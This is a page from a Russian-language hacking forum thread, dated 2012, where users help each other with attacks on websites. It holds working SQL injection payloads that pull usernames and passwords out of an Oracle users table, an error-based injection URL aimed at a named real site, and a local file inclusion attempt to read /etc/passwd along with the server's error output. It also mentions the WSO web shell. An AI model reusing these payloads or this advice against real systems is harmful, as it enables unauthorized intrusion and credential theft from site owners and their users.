HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2094 из 2438 « Первая < 10941594199420442084 2090 2091 2092 2093 2094 2095 2096 2097 2098 210421442194 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #20931  
Старый 02.07.2012, 15:26
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию
Цитата:
Сообщение от kingbeef  
kingbeef said:
Помогите с oracle.
Как вывести логины и пассы вместе?
union+select+null,null,password,null,null,null,nul l+from+users--
union+select+null,null,username,,null,null,null,nu ll+from+users--
По отдельности выводит.
Код:
Code:
union+select+null,null,concat(username,password),null,null,null,nul l+from+users--
Код:
Code:
union+select+null,null,(username || ':' || password)x,null,null,null,nul l+from+users--
 
Ответить с цитированием

  #20932  
Старый 02.07.2012, 19:26
loskstyle
Guest
Сообщений: n/a
Провел на форуме:
198

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
Вроде в WSO есть... не?
Но работает он только в версии с "suid".
 
Ответить с цитированием

  #20933  
Старый 03.07.2012, 00:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию
Del msg
 
Ответить с цитированием

  #20934  
Старый 03.07.2012, 00:32
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию
Del msg
 
Ответить с цитированием

  #20935  
Старый 03.07.2012, 00:41
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию
Цитата:
Сообщение от Zed0x  
Zed0x said:
Эмммм, в верху страницы на пол страницы)))
сори у меня чет в мозиле не было хз почему ))

а в хроме есть
 
Ответить с цитированием

  #20936  
Старый 03.07.2012, 11:16
ZARO
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944

Репутация: 37
Отправить сообщение для ZARO с помощью ICQ
По умолчанию
Цитата:
Сообщение от Zed0x  
Zed0x said:
Помогите подобрать колонки. При постановки ковычки вылизает ошибка базу, но почему то не получается:
http://logvinov.info/about/0/0/0/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and(1)='1
 
Ответить с цитированием

  #20937  
Старый 03.07.2012, 11:36
Rootz
Guest
Сообщений: n/a
Провел на форуме:
6521

Репутация: 0
По умолчанию
ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber
 
Ответить с цитированием

  #20938  
Старый 03.07.2012, 14:02
.Varius
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
Провел на форуме:
5777251

Репутация: 796


По умолчанию
Цитата:
Сообщение от Rootz  
Rootz said:
ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber
Основы тут. Далее сам сообразишь, нужны начальные знания синтаксиса СУБД.
 
Ответить с цитированием

  #20939  
Старый 03.07.2012, 14:37
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию
Нашел на неком сайте LFI

Код:
Code:
http://******.ru/book_php.php?id=adminpidaras.php
Пытаюсь крутить

Код:
Code:
http://******.ru/book_php.php?id=../../../../../../../../../../../../../../../../../../../etc/passwd
Цитата:
Сообщение от None  
Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/******/data:.) in /var/www/******/data/www/******.ru/book_php.php on line 387 Warning: include(/etc/passwd): failed to open stream: Operation not permitted in /var/www/******/data/www/******.ru/book_php.php on line 387 Warning: include(): Failed opening 'books/PHP/../../../../../../../../../../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/******/data/www/******.ru/book_php.php on line 387
Поставляю %00, и все-равно ошибка.

Подскажите что я делаю не так?
 
Ответить с цитированием

  #20940  
Старый 03.07.2012, 14:54
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию
Цитата:
Сообщение от None  
Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s)
нулл-байт тут не при чём. В самом конфиге апача прописано куда можно ходить.
 
Ответить с цитированием
Ответ
Страница 2094 из 2438 « Первая < 10941594199420442084 2090 2091 2092 2093 2094 2095 2096 2097 2098 210421442194 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ